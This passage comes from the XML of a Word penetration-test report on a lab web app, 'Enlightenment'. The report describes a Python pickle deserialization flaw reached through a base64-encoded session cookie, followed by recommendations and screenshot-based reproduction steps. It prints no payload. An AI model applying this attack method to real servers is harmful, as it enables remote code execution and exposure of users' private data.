          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(source code provided at ‘http://10.5.50.40/source.zip’), encode it with base64 and send it as a </w:t>
      </w:r>
      <w:r w:rsidR="00002453" w:rsidRPr="00002453">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session cookie</w:t>
      </w:r>
      <w:r w:rsidR="00002453">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00002453" w:rsidRPr="00002453">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="00002453">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> request to the server. </w:t>
      </w:r>
      <w:r w:rsidR="009B00E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon receiving the request, the server unwittingly deserializes the malicious session cookie. This action could result in remote code execution, effectively granting the attacker </w:t>
      </w:r>
      <w:r w:rsidR="009B00E5" w:rsidRPr="00E850A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unauthorized control and access</w:t>
      </w:r>
      <w:r w:rsidR="009B00E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the compromised system.</w:t>
      </w:r>
      <w:r w:rsidR="008739B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since the website is for salvation seekers, the religious affiliation of a person could get disclosed which can lead to privacy concerns and potential harm to individuals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5CC495" w14:textId="77777777" w:rsidR="007356F4" w:rsidRPr="00A7675D" w:rsidRDefault="007356F4" w:rsidP="00123DCA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67094FF1" w14:textId="6180DCB1" w:rsidR="00123DCA" w:rsidRPr="00A7675D" w:rsidRDefault="3EE847B1" w:rsidP="0071459E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc147692932"/>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="587D418A" w14:textId="59C56391" w:rsidR="00C70ED3" w:rsidRDefault="00774C80" w:rsidP="00123DCA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>To mitigate this vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00354FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F96AE15" w14:textId="098BEE2C" w:rsidR="008633A6" w:rsidRDefault="008633A6" w:rsidP="00354FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We strongly recommend </w:t>
      </w:r>
      <w:r w:rsidR="00F57B13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">not to use executable OS commands in the source code, instead </w:t>
      </w:r>
      <w:r w:rsidR="005E1560">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00F57B13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> higher-level libraries, APIs, or frameworks that provide safe interfaces for interacting with the underlying system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A127A" w14:textId="737E0613" w:rsidR="00354FDA" w:rsidRDefault="008633A6" w:rsidP="00354FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Avoid</w:t>
      </w:r>
      <w:r w:rsidR="00354FDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the use of pickle as it is inherently vulnerable to deserialization attacks. Instead, use safer serialization formats like JSON, which are less prone to security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38BC71" w14:textId="786A9FAF" w:rsidR="00354FDA" w:rsidRDefault="00354FDA" w:rsidP="00354FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Implement strict input validation and data validation mechanisms on incoming data, especially on data that will be deserialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F38089" w14:textId="3BA95D81" w:rsidR="00354FDA" w:rsidRPr="00354FDA" w:rsidRDefault="00354FDA" w:rsidP="00354FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Regularly review and analyze the source code, specifically focusing on areas where deserialization occurs. Use static analysis tools to identify potential security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C87D07" w14:textId="77777777" w:rsidR="00A7675D" w:rsidRPr="00A7675D" w:rsidRDefault="00A7675D" w:rsidP="00123DCA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767F3A39" w14:textId="15C5EB7E" w:rsidR="001435BC" w:rsidRPr="00A7675D" w:rsidRDefault="001435BC" w:rsidP="001435BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc147692933"/>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="051728A3" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03212403" w14:textId="278E8B3E" w:rsidR="00A22945" w:rsidRPr="00A7675D" w:rsidRDefault="00A22945" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: The landing page for </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="007F46E4" w:rsidRPr="004210AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://10.5.50.40</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007F46E4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Enlightenment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C688FDE"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4BCF6B2A" w14:textId="6EDCBF19" w:rsidR="00B02A48" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="259C01D8" wp14:editId="7F7876EC">
            <wp:extent cx="8229600" cy="3808730"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="16788594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5943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3808730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00603428" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88B6F8"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4948F693"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139F3B43"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4FC8EBCF"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4F8552B4"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7077EB2D"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092BB2F0"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7AE2573E"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3F9F28C9"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2474C7FD" w14:textId="5FD5977B" w:rsidR="00A22945" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="00A22945" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The page after a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00A22945" w:rsidRPr="00DF47BD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF47BD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00A22945" w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is submitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE003F" w14:textId="77777777" w:rsidR="00A22945" w:rsidRPr="00A7675D" w:rsidRDefault="00A22945" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D9965A9" w14:textId="4EB6E6AC" w:rsidR="00A22945" w:rsidRPr="00A7675D" w:rsidRDefault="00A22945" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59BC3C09" wp14:editId="4603163A">
            <wp:extent cx="8229600" cy="3811905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1880503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030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3811905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35509B57" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6C028B" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E45DC52" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10056875" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A21FAF0" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582C5673" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FEA5EA1" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1898DB88" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="002E497B" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B76E3E5" w14:textId="386CA7C9" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="008526F6" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:t>Step 3: The request as seen from burp proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70366EE8" w14:textId="77777777" w:rsidR="006B4DC5" w:rsidRPr="00A7675D" w:rsidRDefault="006B4DC5" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4512A8" w14:textId="5E76E17E" w:rsidR="006B4DC5" w:rsidRDefault="008526F6" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note: A unique session cookie generated is highlighted below</w:t>
      </w:r>
      <w:r w:rsidR="003715CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D450ED" w14:textId="77777777" w:rsidR="007F46E4" w:rsidRPr="003715CC" w:rsidRDefault="007F46E4" w:rsidP="00A22945">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD9253A" w14:textId="53FD5371" w:rsidR="00CF78EE" w:rsidRPr="00A7675D" w:rsidRDefault="00AC6085" w:rsidP="00D133FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc147692934"/>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38770B9D" wp14:editId="5D55F774">
            <wp:extent cx="8229600" cy="3862070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="7621505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0563"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3862070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3233C8F6" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A424A11" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2A7926" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB9A810" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D68BA36" w14:textId="77777777" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CEBA6B" w14:textId="06CD2966" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Step 4: The vulnerable code is highlighted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626BADE" w14:textId="66DB9716" w:rsidR="00093F7B" w:rsidRPr="003715CC" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Note: Python pickle is inherently vulnerable to deserialization attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00C47719" w:rsidRPr="003715CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> The source code was provided at ‘http://10.5.50.40.source.zip’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF13C04" w14:textId="238338B5" w:rsidR="006C3589" w:rsidRPr="00A7675D" w:rsidRDefault="006C3589" w:rsidP="006C3589">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7675D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C233006" wp14:editId="3CB3EB48">
            <wp:extent cx="8229600" cy="3729990"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="146142853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28535" name="Picture 8"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729990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A89404" w14:textId="77777777" w:rsidR="004A2581" w:rsidRPr="00A7675D" w:rsidRDefault="004A2581" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEBF022" w14:textId="77777777" w:rsidR="004A2581" w:rsidRPr="00A7675D" w:rsidRDefault="004A2581" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A68DA62" w14:textId="77777777" w:rsidR="004A2581" w:rsidRPr="00A7675D" w:rsidRDefault="004A2581" w:rsidP="004A2581">
      <w:pPr>
        <w:rPr>
